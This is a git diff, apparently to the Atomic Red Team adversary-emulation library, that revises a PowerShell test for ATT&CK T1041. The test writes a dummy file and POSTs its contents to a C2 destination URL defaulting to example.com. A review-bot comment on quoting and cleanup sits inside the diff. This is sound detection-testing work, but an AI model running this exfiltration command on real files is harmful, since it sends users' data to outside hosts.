diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 2bf4e794..8bf51ace 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -71612,25 +71612,12 @@ exfiltration:
 filepath:
 description: The file which is being exfiltrated to the C2 Server.
 type: Path
- default: C:\Users\$env:UserName\LineNumbers.txt
- dependency_executor_name: powershell
- dependencies:
- - description: 'The file to be exfiltrated must be present on the machine. Running
- the pre-reqs will create a sample file to be exfiltrated, else give the
- path of already present file as input.
-
-'
- prereq_command: 'if ([System.IO.File]::Exists("#{filepath}")){exit 0} else
- {exit 1}
-
-'
- get_prereq_command: "echo \"Creating file to be exfiltrated\" \n1..100 | ForEach-Object
- { Add-Content -Path #{filepath} -Value \"This is line $_.\" }\n"
+ default: "$env:TEMP\\LineNumbers.txt"
 executor:
- command: |
- [System.Net.ServicePointManager]::Expect100Continue = $false
- $filecontent = Get-Content -Path #{filepath}
- Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
+ command: "if(-not (Test-Path #{filepath})){ \n 1..100 | ForEach-Object {
+ Add-Content -Path #{filepath} -Value \"This is line $_.\" }\n}\n[System.Net.ServicePointManager]::Expect100Continue
+ = $false\n$filecontent = Get-Content -Path #{filepath}\nInvoke-WebRequest
+ -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive\n"
 name: powershell
 T1011:
 technique:
diff --git a/atomics/T1041/T1041.md b/atomics/T1041/T1041.md
index 2d8b0c5b..79c6bc1b 100644
--- a/atomics/T1041/T1041.md
+++ b/atomics/T1041/T1041.md
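Review bot: The new inline command expands `#{filepath}` unquoted in `Test-Path #{filepath}` and `Add-Content -Path #{filepath}`, whereas the prereq check it replaces quoted it as `"#{filepath}"`; a path containing a space (which `$env:TEMP` can contain) now splits into separate arguments and the create-if-missing branch fails. `Test-Path` also returns true for a directory, so a directory passed as `filepath` skips creation and `Get-Content` then errors; `if(-not (Test-Path -PathType Leaf "#{filepath}")){` covers both cases. Dropping the dependency block also removes the `exit 0`/`exit 1` prereq signal and the "Creating file to be exfiltrated" message, so a mistyped path now silently posts freshly generated dummy lines instead of the intended file — a `Write-Host "Creating sample file #{filepath}"` inside the branch would keep that feedback. No cleanup of the generated file is visible in this hunk; if the test has no `cleanup_command`, the sample file is left behind in `$env:TEMP`. If `index.yaml` is regenerated from the technique's own YAML, these fixes belong in that source file rather than here.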
@@ -25,13 +25,16 @@ Exfiltrates a file present on the victim machine to the C2 server.
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | destination_url | Destination URL to post encoded data. | String | example.com|
-| filepath | The file which is being exfiltrated to the C2 Server. | Path | C:\Users\$env:UserName\LineNumbers.txt|
+| filepath | The file which is being exfiltrated to the C2 Server. | Path | $env:TEMP\LineNumbers.txt|
 
 
 #### Attack Commands: Run with `powershell`!
 
 
 ```powershell
+if(-not (Test-Path #{filepath})){
+ 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
+}
 [System.Net.ServicePointManager]::Expect100Continue = $false
 $filecontent = Get-Content -Path #{filepath}
 Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
@@ -40,19 +43,6 @@ Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -Disab
 
 
 
-#### Dependencies: Run with `powershell`!
-##### Description: The file to be exfiltrated must be present on the machine. Running the pre-reqs will create a sample file to be exfiltrated, else give the path of already present file as input.
-##### Check Prereq Commands:
-```powershell
-if ([System.IO.File]::Exists("#{filepath}")){exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-echo "Creating file to be exfiltrated"
-1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
-```
-
-
 
 
 